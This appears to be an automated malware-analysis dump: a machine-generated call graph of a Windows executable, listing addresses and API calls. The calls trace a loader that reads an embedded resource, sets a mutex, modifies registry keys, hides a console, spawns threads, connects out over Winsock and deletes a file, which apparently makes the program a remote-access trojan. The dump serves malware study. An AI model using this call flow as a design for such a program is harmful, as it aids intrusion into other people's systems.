46948c3 96725->96727 97046 46949f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96725->97046 96735 4694902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96727->96735 97047 46a4251 5 API calls TranslatorGuardHandler 96727->97047 96729 46948dc 96731 46948e2 ___FrameUnwindToState 96729->96731 97048 46a41f5 5 API calls TranslatorGuardHandler 96729->97048 96732 4694962 96760 4694b14 96732->96760 96735->96732 97049 46a33e7 38 API calls 3 library calls 96735->97049 96742 4694984 96743 469498e 96742->96743 97051 46a341f 28 API calls _abort 96742->97051 96745 4694997 96743->96745 97052 46a33c2 28 API calls _abort 96743->97052 97053 469470d 13 API calls 2 library calls 96745->97053 96748 469499f 96748->96731 96750 469459f 96749->96750 97054 4694c52 IsProcessorFeaturePresent 96750->97054 96752 46945ab 97055 4698f31 10 API calls 4 library calls 96752->97055 96754 46945b0 96755 46945b4 96754->96755 97056 46a40bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96754->97056 96755->96725 96757 46945bd 96758 46945cb 96757->96758 97057 4698f5a 8 API calls 3 library calls 96757->97057 96758->96725 97058 4696e90 96760->97058 96762 4694b27 GetStartupInfoW 96763 4694968 96762->96763 96764 46a41a2 96763->96764 97060 46af059 96764->97060 96766 4694971 96769 466e9c5 96766->96769 96768 46a41ab 96768->96766 97064 46a6815 38 API calls 96768->97064 97066 467cb50 LoadLibraryA GetProcAddress 96769->97066 96771 466e9e1 GetModuleFileNameW 97071 466f3c3 96771->97071 96773 466e9fd 96774 46620f6 28 API calls 96773->96774 96775 466ea0c 96774->96775 96776 46620f6 28 API calls 96775->96776 96777 466ea1b 96776->96777 97086 467be1b 96777->97086 96781 466ea2d 96782 4661e8d 26 API calls 96781->96782 96783 466ea36 96782->96783 96784 466ea93 96783->96784 96785 466ea49 96783->96785 97112 4661e65 96784->97112 97386 466fbb3 116 API calls 96785->97386 96788 466eaa3 96792 4661e65 28 API calls 96788->96792 96789 466ea5b 96790 4661e65 28 API calls 96789->96790 96791 466ea67 96790->96791 97387 4670f37 36 API calls __EH_prolog 96791->97387 96793 466eac2 96792->96793 97117 466531e 96793->97117 96796 466ead1 97122 4666383 96796->97122 96797 466ea79 97388 466fb64 77 API calls 96797->97388 96801 466ea82 97389 466f3b0 70 API calls 96801->97389 96805 4661fd8 26 API calls 96806 466eaf2 96805->96806 96809 4661fd8 26 API calls 96806->96809 96807 4661fd8 26 API calls 96808 466eefb 96807->96808 97050 46a32f6 GetModuleHandleW 96808->97050 96810 466eafb 96809->96810 96811 4661e65 28 API calls 96810->96811 96812 466eb04 96811->96812 97136 4661fc0 96812->97136 96814 466eb0f 96815 4661e65 28 API calls 96814->96815 96816 466eb28 96815->96816 96817 4661e65 28 API calls 96816->96817 96819 466eb43 96817->96819 96818 466ebae 96820 4661e65 28 API calls 96818->96820 96819->96818 97390 4666c1e 96819->97390 96827 466ebbb 96820->96827 96822 466eb70 96823 4661fe2 28 API calls 96822->96823 96824 466eb7c 96823->96824 96825 4661fd8 26 API calls 96824->96825 96828 466eb85 96825->96828 96826 466ec02 97140 466d069 96826->97140 96827->96826 96831 4673549 3 API calls 96827->96831 97395 4673549 RegOpenKeyExA 96828->97395 96830 466ec08 96832 466ea8b 96830->96832 97143 467b2c3 96830->97143 96838 466ebe6 96831->96838 96832->96807 96836 466ec23 96839 466ec76 96836->96839 97160 4667716 96836->97160 96837 466f34f 97471 46739a9 30 API calls 96837->97471 96838->96826 97398 46739a9 30 API calls 96838->97398 96841 4661e65 28 API calls 96839->96841 96844 466ec7f 96841->96844 96854 466ec90 96844->96854 96855 466ec8b 96844->96855 96846 466f365 97472 4672475 65 API calls ___scrt_fastfail 96846->97472 96847 466ec42 97399 4667738 30 API calls 96847->97399 96848 466ec4c 96851 4661e65 28 API calls 96848->96851 96863 466ec55 96851->96863 96852 466f36f 96853 467bc5e 28 API calls 96852->96853 96857 466f37f 96853->96857 96860 4661e65 28 API calls 96854->96860 97402 4667755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 96855->97402 96856 466ec47 97400 4667260 97 API calls 96856->97400 97284 4673a23 RegOpenKeyExW 96857->97284 96861 466ec99 96860->96861 97164 467bc5e 96861->97164 96863->96839 96867 466ec71 96863->96867 96864 466eca4 97168 4661f13 96864->97168 97401 4667260 97 API calls 96867->97401 96871 4661f09 26 API calls 96873 466f39c 96871->96873 96875 4661f09 26 API calls 96873->96875 96877 466f3a5 96875->96877 96876 4661e65 28 API calls 96878 466ecc1 96876->96878 97287 466dd42 96877->97287 96882 4661e65 28 API calls 96878->96882 96884 466ecdb 96882->96884 96883 466f3af 96885 4661e65 28 API calls 96884->96885 96886 466ecf5 96885->96886 96887 4661e65 28 API calls 96886->96887 96889 466ed0e 96887->96889 96888 466ed7b 96891 466ed8a 96888->96891 96897 466ef06 ___scrt_fastfail 96888->96897 96889->96888 96890 4661e65 28 API calls 96889->96890 96895 466ed23 _wcslen 96890->96895 96892 466ed93 96891->96892 96919 466ee0f ___scrt_fastfail 96891->96919 96893 4661e65 28 API calls 96892->96893 96894 466ed9c 96893->96894 96896 4661e65 28 API calls 96894->96896 96895->96888 96899 4661e65 28 API calls 96895->96899 96898 466edae 96896->96898 97463 46736f8 RegOpenKeyExA 96897->97463 96902 4661e65 28 API calls 96898->96902 96900 466ed3e 96899->96900 96903 4661e65 28 API calls 96900->96903 96904 466edc0 96902->96904 96905 466ed53 96903->96905 96907 4661e65 28 API calls 96904->96907 97403 466da34 96905->97403 96906 466ef51 96908 4661e65 28 API calls 96906->96908 96911 466ede9 96907->96911 96909 466ef76 96908->96909 97190 4662093 96909->97190 96916 4661e65 28 API calls 96911->96916 96913 4661f13 28 API calls 96915 466ed72 96913->96915 96920 4661f09 26 API calls 96915->96920 96917 466edfa 96916->96917 97461 466cdf9 45 API calls _wcslen 96917->97461 96918 466ef88 97196 467376f RegCreateKeyA 96918->97196 97180 4673947 96919->97180 96920->96888 96924 466ee0a 96924->96919 96926 466eea3 ctype 96929 4661e65 28 API calls 96926->96929 96927 4661e65 28 API calls 96928 466efaa 96927->96928 97202 469baac 96928->97202 96930 466eeba 96929->96930 96930->96906 96933 466eece 96930->96933 96935 4661e65 28 API calls 96933->96935 96934 466efe4 96939 4662093 28 API calls 96934->96939 96937 466eed7 96935->96937 96940 467bc5e 28 API calls 96937->96940 96941 466eff9 96939->96941 96942 466eee3 96940->96942 96943 4662093 28 API calls 96941->96943 97462 466f474 103 API calls 96942->97462 96945 466f008 96943->96945 97215 467b4ef 96945->97215 96946 466eee8 96946->96906 96948 466eeef 96946->96948 96948->96832 96950 4661e65 28 API calls 96951 466f019 96950->96951 96952 4661e65 28 API calls 96951->96952 96953 466f02b 96952->96953 96954 4661e65 28 API calls 96953->96954 96955 466f04b 96954->96955 96956 469baac _strftime 42 API calls 96955->96956 96957 466f058 96956->96957 96958 4661e65 28 API calls 96957->96958 96959 466f063 96958->96959 96960 4661e65 28 API calls 96959->96960 96961 466f074 96960->96961 96962 4661e65 28 API calls 96961->96962 96963 466f089 96962->96963 96964 4661e65 28 API calls 96963->96964 96965 466f09a 96964->96965 96966 466f0a1 StrToIntA 96965->96966 97239 4669de4 96966->97239 96969 4661e65 28 API calls 96970 466f0bc 96969->96970 96971 466f101 96970->96971 96972 466f0c8 96970->96972 96975 4661e65 28 API calls 96971->96975 97466 46944ea 22 API calls 2 library calls 96972->97466 96974 466f0d1 96976 4661e65 28 API calls 96974->96976 96977 466f111 96975->96977 96978 466f0e4 96976->96978 96980 466f11d 96977->96980 96981 466f159 96977->96981 96979 466f0eb CreateThread 96978->96979 96979->96971 98502 4679fb4 102 API calls 2 library calls 96979->98502 97467 46944ea 22 API calls 2 library calls 96980->97467 96982 4661e65 28 API calls 96981->96982 96985 466f162 96982->96985 96984 466f126 96986 4661e65 28 API calls 96984->96986 96988 466f16e 96985->96988 96989 466f1cc 96985->96989 96987 466f138 96986->96987 96990 466f13f CreateThread 96987->96990 96992 4661e65 28 API calls 96988->96992 96991 4661e65 28 API calls 96989->96991 96990->96981 98506 4679fb4 102 API calls 2 library calls 96990->98506 96993 466f1d5 96991->96993 96994 466f17e 96992->96994 96995 466f1e1 96993->96995 96996 466f21a 96993->96996 96997 4661e65 28 API calls 96994->96997 97000 4661e65 28 API calls 96995->97000 97264 467b60d 96996->97264 96998 466f193 96997->96998 97468 466d9e8 31 API calls 96998->97468 97001 466f1ea 97000->97001 97006 4661e65 28 API calls 97001->97006 97003 4661f13 28 API calls 97005 466f22e 97003->97005 97008 4661f09 26 API calls 97005->97008 97010 466f1ff 97006->97010 97007 466f1a6 97011 4661f13 28 API calls 97007->97011 97009 466f237 97008->97009 97012 466f243 CreateThread 97009->97012 97013 466f240 SetProcessDEPPolicy 97009->97013 97020 469baac _strftime 42 API calls 97010->97020 97014 466f1b2 97011->97014 97015 466f264 97012->97015 97016 466f258 CreateThread 97012->97016 98475 466f7a7 97012->98475 97013->97012 97017 4661f09 26 API calls 97014->97017 97018 466f26d CreateThread 97015->97018 97019 466f279 97015->97019 97016->97015 98503 46720f7 137 API calls 97016->98503 97021 466f1bb CreateThread 97017->97021 97018->97019 98504 46726db 38 API calls ___scrt_fastfail 97018->98504 97023 466f2cc 97019->97023 97025 4662093 28 API calls 97019->97025 97022 466f20c 97020->97022 97021->96989 98505 4661be9 49 API calls _strftime 97021->98505 97469 466c162 7 API calls 97022->97469 97281 46734ff RegOpenKeyExA 97023->97281 97026 466f29c 97025->97026 97276 46652fd 97026->97276 97031 466f2ed 97034 467bc5e 28 API calls 97031->97034 97032 4662093 28 API calls 97033 466f2bb 97032->97033 97035 467b4ef 79 API calls 97033->97035 97036 466f2fd 97034->97036 97037 466f2c0 97035->97037 97470 467361b 31 API calls 97036->97470 97038 4661fd8 26 API calls 97037->97038 97038->97023 97040 466f313 97041 4661f09 26 API calls 97040->97041 97043 466f31e 97041->97043 97042 466f346 DeleteFileW 97042->97043 97044 466f34d 97042->97044 97043->96852 97043->97042 97045 466f334 Sleep 97043->97045 97044->96852 97045->97043 97046->96725 97047->96729 97048->96735 97049->96732 97050->96742 97051->96743 97052->96745 97053->96748 97054->96752 97055->96754 97056->96757 97057->96755 97059 4696ea7 97058->97059 97059->96762 97059->97059 97061 46af062 97060->97061 97063 46af06b 97060->97063 97065 46aef58 51 API calls 5 library calls 97061->97065 97063->96768 97064->96768 97065->97063 97067 467cb8f LoadLibraryA GetProcAddress 97066->97067 97068 467cb7f GetModuleHandleA GetProcAddress 97066->97068 97069 467cbb8 44 API calls 97067->97069 97070 467cba8 LoadLibraryA GetProcAddress 97067->97070 97068->97067 97069->96771 97070->97069 97473 467b4a8 FindResourceA 97071->97473 97074 469bd51 new 21 API calls 97075 466f3ed ctype 97074->97075 97076 46620b7 28 API calls 97075->97076 97077 466f408 97076->97077 97078 4661fe2 28 API calls 97077->97078 97079 466f413 97078->97079 97080 4661fd8 26 API calls 97079->97080 97081 466f41c 97080->97081 97082 469bd51 new 21 API calls 97081->97082 97083 466f42d ctype 97082->97083 97476 4666dd8 97083->97476 97085 466f460 97085->96773 97087 46620df 26 API calls 97086->97087 97107 467be2e 97087->97107 97088 467be9e 97089 4661fd8 26 API calls 97088->97089 97090 467bed0 97089->97090 97092 4661fd8 26 API calls 97090->97092 97091 467bea0 97093 46641a2 28 API calls 97091->97093 97095 467bed8 97092->97095 97097 467beac 97093->97097 97096 4661fd8 26 API calls 97095->97096 97098 466ea24 97096->97098 97099 4661fe2 28 API calls 97097->97099 97108 466fb17 97098->97108 97101 467beb5 97099->97101 97100 4661fe2 28 API calls 97100->97107 97102 4661fd8 26 API calls 97101->97102 97104 467bebd 97102->97104 97103 4661fd8 26 API calls 97103->97107 97483 467ce34 28 API calls 97104->97483 97107->97088 97107->97091 97107->97100 97107->97103 97479 46641a2 97107->97479 97482 467ce34 28 API calls 97107->97482 97109 466fb23 97108->97109 97111 466fb2a 97108->97111 97490 4662163 26 API calls 97109->97490 97111->96781 97113 4661e6d 97112->97113 97114 4661e75 97113->97114 97491 4662158 28 API calls 97113->97491 97114->96788 97118 46620df 26 API calls 97117->97118 97119 466532a 97118->97119 97492 46632a0 97119->97492 97121 4665346 97121->96796 97496 46651ef 97122->97496 97124 4666391 97500 4662055 97124->97500 97127 4661fe2 97128 4661ff1 97127->97128 97135 4662039 97127->97135 97129 46623ce 26 API calls 97128->97129 97130 4661ffa 97129->97130 97131 466203c 97130->97131 97133 4662015 97130->97133 97132 466267a 26 API calls 97131->97132 97132->97135 97536 4663098 28 API calls 97133->97536 97135->96805 97137 4661fd2 97136->97137 97138 4661fc9 97136->97138 97137->96814 97537 46625e0 28 API calls 97138->97537 97538 4661fab 97140->97538 97142 466d073 CreateMutexA GetLastError 97142->96830 97539 467bfb7 97143->97539 97148 4661fe2 28 API calls 97149 467b2ff 97148->97149 97150 4661fd8 26 API calls 97149->97150 97151 467b307 97150->97151 97152 46735a6 31 API calls 97151->97152 97153 467b35d 97151->97153 97154 467b330 97152->97154 97153->96836 97155 467b33b StrToIntA 97154->97155 97156 467b352 97155->97156 97157 467b349 97155->97157 97159 4661fd8 26 API calls 97156->97159 97547 467cf69 28 API calls 97157->97547 97159->97153 97161 466772a 97160->97161 97162 4673549 3 API calls 97161->97162 97163 4667731 97162->97163 97163->96847 97163->96848 97165 467bc72 97164->97165 97548 466b904 97165->97548 97167 467bc7a 97167->96864 97169 4661f22 97168->97169 97170 4661f6a 97168->97170 97171 4662252 26 API calls 97169->97171 97177 4661f09 97170->97177 97172 4661f2b 97171->97172 97173 4661f6d 97172->97173 97174 4661f46 97172->97174 97581 4662336 97173->97581 97580 466305c 28 API calls 97174->97580 97178 4662252 26 API calls 97177->97178 97179 4661f12 97178->97179 97179->96876 97181 4673965 97180->97181 97182 4666dd8 28 API calls 97181->97182 97183 467397a 97182->97183 97184 46620f6 28 API calls 97183->97184 97185 467398a 97184->97185 97186 467376f 29 API calls 97185->97186 97187 4673994 97186->97187 97188 4661fd8 26 API calls 97187->97188 97189 46739a1 97188->97189 97189->96926 97191 466209b 97190->97191 97192 46623ce 26 API calls 97191->97192 97193 46620a6 97192->97193 97585 46624ed 97193->97585 97197 46737bf 97196->97197 97199 4673788 97196->97199 97198 4661fd8 26 API calls 97197->97198 97200 466ef9e 97198->97200 97201 467379a RegSetValueExA RegCloseKey 97199->97201 97200->96927 97201->97197 97203 469bac5 _strftime 97202->97203 97589 469ae03 97203->97589 97206 467cd9b AllocConsole GetConsoleWindow 97207 467cdc3 97206->97207 97208 467cdba ShowWindow 97206->97208 97630 46a1c22 97207->97630 97208->97207 97212 467cded ___scrt_fastfail 97636 4667200 97212->97636 97216 467b505 GetLocalTime 97215->97216 97217 467b5a0 97215->97217 97219 466531e 28 API calls 97216->97219 97218 4661fd8 26 API calls 97217->97218 97220 467b5a8 97218->97220 97221 467b547 97219->97221 97222 4661fd8 26 API calls 97220->97222 97223 4666383 28 API calls 97221->97223 97225 466f00d 97222->97225 97224 467b553 97223->97224 97780 4662f10 97224->97780 97225->96950 97228 4666383 28 API calls 97229 467b56b 97228->97229 97230 4667200 76 API calls 97229->97230 97231 467b579 97230->97231 97232 4661fd8 26 API calls 97231->97232 97233 467b585 97232->97233 97234 4661fd8 26 API calls 97233->97234 97235 467b58e 97234->97235 97236 4661fd8 26 API calls 97235->97236 97237 467b597 97236->97237 97238 4661fd8 26 API calls 97237->97238 97238->97217 97240 4669e02 _wcslen 97239->97240 97241 4669e24 97240->97241 97242 4669e0d 97240->97242 97244 466da34 31 API calls 97241->97244 97243 466da34 31 API calls 97242->97243 97245 4669e15 97243->97245 97246 4669e2c 97244->97246 97247 4661f13 28 API calls 97245->97247 97248 4661f13 28 API calls 97246->97248 97263 4669e1f 97247->97263 97249 4669e3a 97248->97249 97250 4661f09 26 API calls 97249->97250 97251 4669e42 97250->97251 97803 466915b 28 API calls 97251->97803 97252 4661f09 26 API calls 97254 4669e79 97252->97254 97788 466a109 97254->97788 97255 4669e54 97804 4663014 97255->97804 97260 4661f13 28 API calls 97261 4669e69 97260->97261 97262 4661f09 26 API calls 97261->97262 97262->97263 97263->97252 97265 467b630 GetUserNameW 97264->97265 98008 466417e 97265->98008 97270 4663014 28 API calls 97271 467b672 97270->97271 97272 4661f09 26 API calls 97271->97272 97273 467b67b 97272->97273 97274 4661f09 26 API calls 97273->97274 97275 466f223 97274->97275 97275->97003 98100 466535f 97276->98100 97278 466530b 97279 4662055 26 API calls 97278->97279 97280 466531a 97279->97280 97280->97032 97282 466f2e4 97281->97282 97283 4673520 RegQueryValueExA RegCloseKey 97281->97283 97282->96877 97282->97031 97283->97282 97285 4673a3f RegDeleteValueW 97284->97285 97286 466f392 97284->97286 97285->97286 97286->96871 97288 466dd5b 97287->97288 97289 46734ff 3 API calls 97288->97289 97290 466dd62 97289->97290 97291 466dd81 97290->97291 98119 4661707 97290->98119 97295 4674f2a 97291->97295 97293 466dd6f 98122 4673877 RegCreateKeyA 97293->98122 97296 46620df 26 API calls 97295->97296 97297 4674f3e 97296->97297 98138 467b8b3 97297->98138 97300 46620df 26 API calls 97301 4674f54 97300->97301 97302 4661e65 28 API calls 97301->97302 97303 4674f62 97302->97303 97304 469baac _strftime 42 API calls 97303->97304 97305 4674f6f 97304->97305 97306 4674f74 Sleep 97305->97306 97307 4674f81 97305->97307 97306->97307 97308 4662093 28 API calls 97307->97308 97309 4674f90 97308->97309 97310 4661e65 28 API calls 97309->97310 97311 4674f99 97310->97311 97312 46620f6 28 API calls 97311->97312 97313 4674fa4 97312->97313 97314 467be1b 28 API calls 97313->97314 97315 4674fac 97314->97315 98142 466489e WSAStartup 97315->98142 97317 4674fb6 97318 4661e65 28 API calls 97317->97318 97319 4674fbf 97318->97319 97320 4661e65 28 API calls 97319->97320 97338 467503e 97319->97338 97321 4674fd8 97320->97321 97324 4661e65 28 API calls 97321->97324 97322 4661e65 28 API calls 97322->97338 97323 46620f6 28 API calls 97323->97338 97325 4674fe9 97324->97325 97327 4661e65 28 API calls 97325->97327 97326 467be1b 28 API calls 97326->97338 97328 4674ffa 97327->97328 97329 4661e65 28 API calls 97328->97329 97331 467500b 97329->97331 97330 4666c1e 28 API calls 97330->97338 97333 4661e65 28 API calls 97331->97333 97332 4661fe2 28 API calls 97332->97338 97334 467501c 97333->97334 97335 4661e65 28 API calls 97334->97335 97336 467502e 97335->97336 98278 466473d 88 API calls 97336->98278 97338->97322 97338->97323 97338->97326 97338->97330 97338->97332 97340 467518c WSAGetLastError 97338->97340 97345 467519c 97338->97345 97350 466531e 28 API calls 97338->97350 97355 4666383 28 API calls 97338->97355 97356 4662093 28 API calls 97338->97356 97357 467b4ef 79 API calls 97338->97357 97360 466905c 28 API calls 97338->97360 97361 46a1e81 26 API calls 97338->97361 97362 46736f8 3 API calls 97338->97362 97363 46735a6 31 API calls 97338->97363 97364 466417e 28 API calls 97338->97364 97367 4661e65 28 API calls 97338->97367 97371 467bb8e 28 API calls 97338->97371 97374 467bd1e 28 API calls 97338->97374 97376 4662ea1 28 API calls 97338->97376 97377 4662f10 28 API calls 97338->97377 97378 4664aa1 60 API calls 97338->97378 97379 4661fd8 26 API calls 97338->97379 97380 4661f09 26 API calls 97338->97380 98143 4674ee9 97338->98143 98148 466482d 97338->98148 98155 4664f51 97338->98155 98170 46648c8 connect 97338->98170 98230 467b7e0 97338->98230 98233 46745bd 97338->98233 98236 466dd89 97338->98236 98242 467bc42 97338->98242 98245 467bae6 97338->98245 98247 467ba96 97338->98247 98252 466f8d1 GetLocaleInfoA 97338->98252 98255 4662f31 97338->98255 98260 4664c10 97338->98260 98279 467cae1 30 API calls 97340->98279 97343 46652fd 28 API calls 97343->97345 97345->97338 97345->97343 97347 4662093 28 API calls 97345->97347 97348 467b4ef 79 API calls 97345->97348 97351 4661e65 28 API calls 97345->97351 97352 4661e8d 26 API calls 97345->97352 97353 469baac _strftime 42 API calls 97345->97353 97383 4675a71 CreateThread 97345->97383 97384 4661fd8 26 API calls 97345->97384 97385 4661f09 26 API calls 97345->97385 98280 466b051 84 API calls 97345->98280 98281 4664e26 98 API calls 97345->98281 97347->97345 97348->97345 97350->97338 97351->97345 97352->97345 97354 4675acf Sleep 97353->97354 97354->97345 97355->97338 97356->97338 97357->97338 97360->97338 97361->97338 97362->97338 97363->97338 97364->97338 97368 4675439 GetTickCount 97367->97368 97369 467bb8e 28 API calls 97368->97369 97369->97338 97371->97338 97374->97338 97376->97338 97377->97338 97378->97338 97379->97338 97380->97338 97383->97345 98462 467ad17 104 API calls 97383->98462 97384->97345 97385->97345 97386->96789 97387->96797 97388->96801 97391 46620df 26 API calls 97390->97391 97392 4666c2a 97391->97392 97393 46632a0 28 API calls 97392->97393 97394 4666c47 97393->97394 97394->96822 97396 4673573 RegQueryValueExA RegCloseKey 97395->97396 97397 466eba4 97395->97397 97396->97397 97397->96818 97397->96837 97398->96826 97399->96856 97400->96848 97401->96839 97402->96854 97404 4661f86 26 API calls 97403->97404 97405 466da50 97404->97405 97406 466daa5 97405->97406 97407 466da70 97405->97407 97408 466da66 97405->97408 97411 467bfb7 GetCurrentProcess 97406->97411 98463 467b5b4 29 API calls 97407->98463 97410 466db99 GetLongPathNameW 97408->97410 97414 466417e 28 API calls 97410->97414 97412 466daaa 97411->97412 97415 466db00 97412->97415 97416 466daae 97412->97416 97413 466da79 97417 4661f13 28 API calls 97413->97417 97418 466dbae 97414->97418 97419 466417e 28 API calls 97415->97419 97420 466417e 28 API calls 97416->97420 97421 466da83 97417->97421 97422 466417e 28 API calls 97418->97422 97425 466db0e 97419->97425 97424 466dabc 97420->97424 97427 4661f09 26 API calls 97421->97427 97423 466dbbd 97422->97423 98466 466ddd1 28 API calls 97423->98466 97431 466417e 28 API calls 97424->97431 97430 466417e 28 API calls 97425->97430 97427->97408 97428 466dbd0 98467 4662fa5 28 API calls 97428->98467 97434 466db24 97430->97434 97433 466dad2 97431->97433 97432 466dbdb 98468 4662fa5 28 API calls 97432->98468 98464 4662fa5 28 API calls 97433->98464 98465 4662fa5 28 API calls 97434->98465 97438 466dbe5 97441 4661f09 26 API calls 97438->97441 97439 466dadd 97443 4661f13 28 API calls 97439->97443 97440 466db2f 97442 4661f13 28 API calls 97440->97442 97444 466dbef 97441->97444 97446 466db3a 97442->97446 97445 466dae8 97443->97445 97447 4661f09 26 API calls 97444->97447 97449 4661f09 26 API calls 97445->97449 97448 4661f09 26 API calls 97446->97448 97450 466dbf8 97447->97450 97452 466db43 97448->97452 97451 466daf1 97449->97451 97453 4661f09 26 API calls 97450->97453 97455 4661f09 26 API calls 97451->97455 97454 4661f09 26 API calls 97452->97454 97456 466dc01 97453->97456 97454->97421 97455->97421 97457 4661f09 26 API calls 97456->97457 97458 466dc0a 97457->97458 97459 4661f09 26 API calls 97458->97459 97460 466dc13 97459->97460 97460->96913 97461->96924 97462->96946 97464 467371e RegQueryValueExA RegCloseKey 97463->97464 97465 4673742 97463->97465 97464->97465 97465->96906 97466->96974 97467->96984 97468->97007 97469->96996 97470->97040 97471->96846 97474 467b4c5 LoadResource LockResource SizeofResource 97473->97474 97475 466f3de 97473->97475 97474->97475 97475->97074 97477 46620b7 28 API calls 97476->97477 97478 4666dec 97477->97478 97478->97085 97484 466423a 97479->97484 97482->97107 97483->97088 97485 4664243 97484->97485 97486 46623ce 26 API calls 97485->97486 97487 466424e 97486->97487 97488 4662569 28 API calls 97487->97488 97489 46641b5 97488->97489 97489->97107 97490->97111 97493 46632aa 97492->97493 97494 46628e8 28 API calls 97493->97494 97495 46632c9 97493->97495 97494->97495 97495->97121 97497 46651fb 97496->97497 97506 4665274 97497->97506 97499 4665208 97499->97124 97501 4662061 97500->97501 97502 46623ce 26 API calls 97501->97502 97503 466207b 97502->97503 97532 466267a 97503->97532 97507 4665282 97506->97507 97508 466529e 97507->97508 97509 4665288 97507->97509 97511 46652b6 97508->97511 97512 46652f5 97508->97512 97521 46625f0 97509->97521 97515 46628e8 28 API calls 97511->97515 97518 466529c 97511->97518 97530 46628a4 28 API calls 97512->97530 97515->97518 97518->97499 97522 4662888 28 API calls 97521->97522 97523 4662602 97522->97523 97524 4662672 97523->97524 97525 4662629 97523->97525 97531 46628a4 28 API calls 97524->97531 97528 46628e8 28 API calls 97525->97528 97529 466263b 97525->97529 97528->97529 97529->97518 97533 466268b 97532->97533 97534 46623ce 26 API calls 97533->97534 97535 466208d 97534->97535 97535->97127 97536->97135 97537->97137 97540 467bfc4 GetCurrentProcess 97539->97540 97541 467b2d1 97539->97541 97540->97541 97542 46735a6 RegOpenKeyExA 97541->97542 97543 46735d4 RegQueryValueExA RegCloseKey 97542->97543 97544 46735fe 97542->97544 97543->97544 97545 4662093 28 API calls 97544->97545 97546 4673613 97545->97546 97546->97148 97547->97156 97549 466b90c 97548->97549 97554 4662252 97549->97554 97551 466b917 97558 466b92c 97551->97558 97553 466b926 97553->97167 97555 46622ac 97554->97555 97556 466225c 97554->97556 97555->97551 97556->97555 97565 4662779 26 API calls std::_Deallocate 97556->97565 97559 466b966 97558->97559 97560 466b938 97558->97560 97577 46628a4 28 API calls 97559->97577 97566 46627e6 97560->97566 97564 466b942 97564->97553 97565->97555 97567 46627ef 97566->97567 97568 4662851 97567->97568 97569 46627f9 97567->97569 97579 46628a4 28 API calls 97568->97579 97572 4662815 97569->97572 97573 4662802 97569->97573 97575 4662813 97572->97575 97576 4662252 26 API calls 97572->97576 97578 4662aea 28 API calls __EH_prolog 97573->97578 97575->97564 97576->97575 97578->97575 97580->97170 97582 4662347 97581->97582 97583 4662252 26 API calls 97582->97583 97584 46623c7 97583->97584 97584->97170 97586 46624f9 97585->97586 97587 466250a 28 API calls 97586->97587 97588 46620b1 97587->97588 97588->96918 97607 469ba0a 97589->97607 97591 466efb7 97591->96934 97591->97206 97592 469ae50 97615 469a7b7 97592->97615 97594 469ae2a 97596 46a05dd __dosmaperr 20 API calls 97594->97596 97595 469ae15 97595->97591 97595->97592 97595->97594 97597 469ae2f 97596->97597 97614 469bcec 26 API calls std::_Deallocate 97597->97614 97600 469ae5c 97601 469ae8b 97600->97601 97623 469ba4f 42 API calls __Tolower 97600->97623 97604 469aef7 97601->97604 97624 469b9b6 26 API calls 2 library calls 97601->97624 97625 469b9b6 26 API calls 2 library calls 97604->97625 97605 469afbe _strftime 97605->97591 97606 46a05dd __dosmaperr 20 API calls 97605->97606 97606->97591 97608 469ba0f 97607->97608 97609 469ba22 97607->97609 97610 46a05dd __dosmaperr 20 API calls 97608->97610 97609->97595 97611 469ba14 97610->97611 97626 469bcec 26 API calls std::_Deallocate 97611->97626 97613 469ba1f 97613->97595 97614->97591 97616 469a7ca 97615->97616 97617 469a7d4 97615->97617 97616->97600 97617->97616 97627 46a8215 38 API calls 4 library calls 97617->97627 97619 469a7f5 97628 46a8364 38 API calls __Tolower 97619->97628 97621 469a80e 97629 46a8391 38 API calls _strftime 97621->97629 97623->97600 97624->97604 97625->97605 97626->97613 97627->97619 97628->97621 97629->97616 97640 46a1b10 97630->97640 97632 467cdda SetConsoleOutputCP 97633 467cd58 GetStdHandle GetConsoleScreenBufferInfo SetConsoleTextAttribute 97632->97633 97634 4667200 76 API calls 97633->97634 97635 467cd8c SetConsoleTextAttribute 97634->97635 97635->97212 97637 466720c 97636->97637 97665 46671e5 97637->97665 97641 46a1b1c ___FrameUnwindToState 97640->97641 97642 46a1b2a 97641->97642 97643 46a1b4b 97641->97643 97646 46a1b5c 97641->97646 97644 46a05dd __dosmaperr 20 API calls 97642->97644 97645 46a05dd __dosmaperr 20 API calls 97643->97645 97647 46a1b2f 97644->97647 97654 46a1b39 ___FrameUnwindToState 97645->97654 97646->97642 97649 46a1b74 97646->97649 97662 469bcec 26 API calls std::_Deallocate 97647->97662 97650 46a1b78 97649->97650 97651 46a1b84 97649->97651 97652 46a05dd __dosmaperr 20 API calls 97650->97652 97661 469c25a EnterCriticalSection 97651->97661 97652->97654 97654->97632 97655 46a1b8f 97657 46a1ba8 97655->97657 97663 46a00a0 65 API calls 3 library calls 97655->97663 97658 46a1bfe 97657->97658 97659 46a05dd __dosmaperr 20 API calls 97657->97659 97664 46a1c18 LeaveCriticalSection 97658->97664 97659->97658 97661->97655 97662->97654 97663->97657 97664->97654 97666 46671f2 ___scrt_initialize_default_local_stdio_options 97665->97666 97669 469f6af 97666->97669 97670 469f6df 97669->97670 97671 469f6f4 97669->97671 97672 46a05dd __dosmaperr 20 API calls 97670->97672 97671->97670 97673 469f6f8 97671->97673 97674 469f6e4 97672->97674 97678 469c34c 97673->97678 97681 469bcec 26 API calls std::_Deallocate 97674->97681 97677 46671fc CreateThread 97677->96934 98469 467d45d GetModuleFileNameA 97677->98469 97682 469c2d3 97678->97682 97680 469c370 97680->97677 97681->97677 97683 469c2df ___FrameUnwindToState 97682->97683 97690 469c25a EnterCriticalSection 97683->97690 97685 469c2ed 97691 469cddb 97685->97691 97689 469c30b ___FrameUnwindToState 97689->97680 97690->97685 97707 46aab22 97691->97707 97694 469a7b7 _strftime 38 API calls 97695 469ce15 97694->97695 97718 469cc76 97695->97718 97705 469c2fa 97706 469c318 LeaveCriticalSection 97705->97706 97706->97689 97749 46aaae7 97707->97749 97709 46aab31 97756 46b54f5 97709->97756 97711 46aab37 97712 469cdfe 97711->97712 97713 46aab8c 97711->97713 97712->97694 97765 46a6137 21 API calls 3 library calls 97713->97765 97715 46aab96 97716 46a6782 _free 20 API calls 97715->97716 97717 46aab9f 97716->97717 97717->97712 97719 469cc95 _swprintf 97718->97719 97720 46a05dd __dosmaperr 20 API calls 97719->97720 97721 469cca1 97720->97721 97722 469d0a0 97721->97722 